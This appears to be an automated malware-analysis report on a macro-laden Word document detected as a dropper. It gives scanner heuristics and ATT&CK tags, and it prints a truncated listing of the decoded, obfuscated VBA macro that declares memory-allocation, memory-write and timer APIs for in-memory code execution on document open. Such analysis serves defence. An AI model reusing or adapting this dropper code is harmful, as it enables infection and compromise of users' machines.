Verdict: MALICIOUS
Risk Score: 122

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The ClamAV heuristic identifies it as a "Doc.Dropper.Agent", suggesting its primary function is to download and execute additional malware. While the VBA code is obfuscated, the presence of the Document_Open macro and the dropper heuristic strongly indicate a malicious intent to compromise the user's system.
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6435560-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6435560-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below was found in document text (OLE body):
  - https://en.wikipedia.org/wiki/Wikipedia:FA
  - https://en.wikipedia.org/wiki/Elcor,_Minnesota
  - https://en.wikipedia.org/wiki/Mesabi_Range
  - https://en.wikipedia.org/wiki/Golden_jackal
  - https://en.wikipedia.org/wiki/Operation_Grapple
  - https://en.wikipedia.org/wiki/Nuclear_test
  - https://en.wikipedia.org/wiki/Hydrogen_bomb
  - https://en.wikipedia.org/wiki/RSPB_Minsmere
  - https://en.wikipedia.org/wiki/More_Hall_Annex
  - https://en.wikipedia.org/wiki/Greek_battleship_Salamis
  - https://en.wikipedia.org/wiki/File:Tottenham_Outrage_in_The_Illustrated_London_News,_30_January_1909_(retouched).jpg
  - https://upload.wikimedia.org/wikipedia/commons/thumb/4/40/Tottenham_Outrage_in_The_Illustrated_London_News%2C_30_January_1909_%28retouched%29.jpg/300px-Tottenham_Outrage_in_The_Illustrated_London_News%2C_30_January_1909_%28retouched%29.jpg
  - https://en.wikipedia.org/wiki/The_Illustrated_London_News
  - https://en.wikipedia.org/wiki/Cyrus_Cuneo
  - https://en.wikipedia.org/wiki/Tottenham_outrage
  - https://en.wikipedia.org/wiki/Lancashire_Fusiliers_War_Memorial
  - https://en.wikipedia.org/wiki/Kate_Winslet
  - https://en.wikipedia.org/wiki/List_of_people_who_have_won_Academy,_Emmy,_Grammy,_and_Tony_Awards
  - https://en.wikipedia.org/wiki/Southern_boobook
  - https://en.wikipedia.org/wiki/Arthur_Sullivan
  - https://en.wikipedia.org/wiki/Gilbert_and_Sullivan
  - https://en.wikipedia.org/wiki/H.M.S._Pinafore
  - https://en.wikipedia.org/wiki/The_Pirates_of_Penzance
  - https://en.wikipedia.org/wiki/The_Mikado
  - https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Elcor,_Minnesota/archive1
  - https://en.wikipedia.org/wiki/User:DrGregMN
  - https://en.wikipedia.org/wiki/Ghost_town
  - https://en.wikipedia.org/wiki/U.S._state
  - https://en.wikipedia.org/wiki/Minnesota
  - https://en.wikipedia.org/wiki/Seven_Iron_Brothers
  - https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Golden_jackal/archive1
  - https://en.wikipedia.org/wiki/User:William_Harris
  - https://en.wikipedia.org/wiki/Evolution_of_the_wolf
  - https://en.wikipedia.org/wiki/Southeast_Europe
  - https://en.wikipedia.org/wiki/Southwest_Asia
  - https://en.wikipedia.org/wiki/South_Asia
  - https://en.wikipedia.org/wiki/Southeast_Asia
  - https://en.wikipedia.org/wiki/Arabian_wolf
  - https://en.wikipedia.org/wiki/Gray_wolf
  - https://en.wikipedia.org/wiki/Least_concern
  - https://en.wikipedia.org/wiki/IUCN_Red_List
  - https://en.wikipedia.org/wiki/British_hydrogen_bomb_programme
  - https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/British_hydrogen_bomb_programme/archive1
  - https://en.wikipedia.org/wiki/User:Hawkeye7
  - https://en.wikipedia.org/wiki/Hydrogen_bombs
  - https://en.wikipedia.org/wiki/Nuclear_weapon_yield
  - https://en.wikipedia.org/wiki/Nuclear_fusion
  - https://en.wikipedia.org/wiki/Sputnik_crisis
  - https://en.wikipedia.org/wiki/1958_US%E2%80%93UK_Mutual_Defence_Agreement
  - https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/RSPB_Minsmere/archive1
  - +224 more URL(s)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10341 bytes |

SHA-256 (macros.bas): 6f931fa96f824ab5f0292ce08b43434a66994ff5c85128166757575faa941005
Preview script: first 1,000 lines of the extracted script (shown as carved; the listing is truncated at the end)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim age As String
Dim skeptical As Byte
forsake = "parsimoniousness"
grail = "lygaeidae"
eyesonly
juno = 38 + 20
Pmt 0, juno, 14012, 55643, 3
End Sub
Attribute VB_Name = "ahtungs"
#If (60 - 63 + 403 + 33 - 81 + 348) > ((58 - 2 + 264) - (57 - 48 + 531) * 1) And ((38 - 112 + 102) - (45 - 64 + 47)) * 2 < (Win64) Then
Public Declare PtrSafe Function tace _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal thinker As Any, ByVal accredit As Any, ByVal husking As Any, ByVal foh As Any, ByVal ostreidae As Any) As LongPtr
Public Declare PtrSafe Function awakened _
Lib "ntdll " Alias _
"NtAllocateVirtualMemory" (pirate As LongPtr, equerry As LongPtr, ByVal soil As LongPtr, untutoredByVal As LongPtr, godmother As LongPtr, ByVal ayrshire As LongPtr) As LongPtr
Public Declare PtrSafe Function condole _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bandit As Any, ByVal duster As Any, ByVal catfish As Any, ByVal mammography As Any, ByVal diathermanous As Any, ByVal groom As Any, ByVal clustered As Any) As Long
#End If
Function bouillon(percophidae, malocclusion, ballup)
Select Case ballup
Case 43 + (10 / 2 - 5)
bouillon = percophidae \ malocclusion
Case 53 + (5 - 3) / 2 - 1
bouillon = percophidae And malocclusion
Case 61 + (56 / 7 - 4 * 2)
bouillon = percophidae * malocclusion
End Select
End Function
Function DynamicBubble(pritor, fortur)
Dim tempVar As Integer
Dim anotherIteration As Boolean
Dim I As Integer
remedy = pritor
Dim arraySize As Integer
Dim myArray() As Integer
For I = remedy To fortur
areca(remedy) = remedy - 65
remedy = remedy + 1
If remedy > fortur Then Exit For
Next
DynamicBubble = remedy
End Function
Attribute VB_Name = "barbarian"
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function condole _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (sweetbrier As Any, ByVal supine As Any, ByVal germfree As Any, ByVal oligarch As Any, ByVal ote As Any, ByVal harshness As Any, ByVal semel As Any) As Long
#End If
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function tace _
Lib "ntdll" Alias _
"NtWriteVirtualMemory" (ByVal andersen As Any, ByVal underwear As Any, ByVal reticule As Any, ByVal angled As Any, ByVal limey As Any) As Long
#End If
Function dormie()
Dim areca(255) As Byte
remedy = 70 - 76 + 71
For I = remedy To 90 + 1
areca(remedy) = remedy - 65
remedy = remedy + 1
If remedy > 90 + 1 Then Exit For
Next
remedy = 40 + 8
For I = remedy To 50 + 8
areca(remedy) = remedy + 4
remedy = remedy + 1
If remedy > 50 + 8 Then Exit For
Next
remedy = 90 + 7
For I = remedy To 120 + 3
areca(remedy) = remedy - 71
remedy = remedy + 1
If remedy > 120 + 3 Then Exit For
Next
areca(47) = 60 + 3
remedy = 40 + 3
areca(remedy) = 60 + 2
dormie = areca
End Function
Attribute VB_Name = "triggerhappy"
Attribute VB_Base = "0{21F5C512-296B-43C7-AF6C-64191BB0A924}{9B470B8D-9AB0-4079-AA7F-2B63FE385F48}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub scrupulously_Change()
End Sub
Attribute VB_Name = "foxitr"
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function awakened Lib _
"ntdll" Alias _
"NtAllocateVirtualMemory" (polaris As Long, hilum As Long, ByVal thickness As Long, beneluxByVal As Long, scupper As Long, ByVal con
... (truncated)
```